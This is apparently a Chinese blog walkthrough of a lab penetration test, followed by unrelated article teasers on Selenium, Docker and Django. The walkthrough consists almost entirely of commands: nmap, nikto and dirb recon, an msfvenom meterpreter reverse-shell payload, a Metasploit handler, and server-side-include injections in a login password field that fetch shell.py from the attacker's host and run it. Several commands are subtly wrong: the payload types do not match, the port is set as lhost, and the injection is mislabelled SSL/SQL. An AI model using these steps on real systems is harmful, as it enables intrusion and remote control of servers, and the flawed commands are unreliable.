信息探测扫描主机服务信息以及服务版本nmap -sV 192.168.101.54快速扫描主机全部信息nmap -T4 -A -v 192.168.101.54探测敏感信息nikto -host http://192.168.101.54dirb http://192.168.101.54登录浏览器:192.168.101.54根据dirb进行网址挨个探测根据提示来利用对应SSL注入漏洞制作webshell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.101.54 lport=4444 -f rawgedit shell.py启动监听
msfconsole
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set lhost 192.168.101.51
set lhost 4444
run返回浏览器
用户名输入1
密码输入<!--#EXEC cmd="wget http://192.168.101.51/shell.py" --> 然后将shell复制到/var/www/html中
mv shell.py /var/www/html再然后开启apache服务
service apache2 start再次返回浏览器
密码<!--#EXEC cmd="chmod 777 shell.py" -->
密码<!--#EXEC cmd="pthon shell.py" -->执行操作
sysinfo 查看系统信息
shell 进入系统shell
优化界面
python -c "import pty;pty.spawn('/bin/bash')"
SQL注入(SSL)
news/2024/11/8 8:37:55/
相关文章
【Python从入门到进阶】36、Selenium 动作交互
接上篇《35、selenium基本语法学习》 上一篇我们介绍了selenium的基本语法,包括元素定位以及访问元素信息的操作。本篇我们来学习selenium操作网页的动作内容。
一、什么是selenium动作操作
动作操作是指使用Selenium调用WebDriver执行与用户交互相关的动作&#…
Docker CMD指令如何覆写
在Dockerfile里,CMD指令是可以被覆盖的。
在构建镜像时,可以通过docker build命令的–cmd选项覆盖Dockerfile的CMD: 例如:
FROM ubuntu
CMD ["echo","hello"]构建时覆盖CMD:
docker build -t test --cmd "echo world" .在创建容器时,可以通过…
C/C++算法入门 | 日期处理
不爱生姜不吃醋⭐️ 如果本文有什么错误的话欢迎在评论区中指正 与其明天开始,不如现在行动! 文章目录 🌴前言🌴日期处理1.题目(codeup 1928)2.思路3.代码实现 🌴总结 🌴前言
日期处…
Django框架介绍和安装
Django框架介绍和安装
组件:
基本配置文件/路由器
模型层(M)/模板层(T)/视图层(v)
Cookie和Seesion
分页及发邮件
Admin管理后台
init.py:Python包的初始化文件 wsgi.py:WEB服务网关的配…
《动手学深度学习 Pytorch版》 7.1 深度卷积神经网络(AlexNet)
7.1.1 学习表征
深度卷积神经网络的突破出现在2012年。突破可归因于以下两个关键因素:
缺少的成分:数据 数据集紧缺的情况在 2010 年前后兴起的大数据浪潮中得到改善。ImageNet 挑战赛中,ImageNet数据集由斯坦福大学教授李飞飞小组的研究人…
项目开发过程中遇到了什么困难?
1.需求最初是什么样的?
2.如何挖掘的需求,挖掘后真实的需求是什么样的?
3.我们做了那些调查?
4.我们给出了那些方案,优缺点是什么?
5.根据实际情况,老板的期望,最终我们选择的什…
1022 D进制的A+B
一.问题: 输入两个非负 10 进制整数 A 和 B (≤230−1),输出 AB 的 D (1<D≤10)进制数。
输入格式:
输入在一行中依次给出 3 个整数 A、B 和 D。
输出格式:
输出 AB 的 D 进制数。
输入样例:
123 456 8输出样…
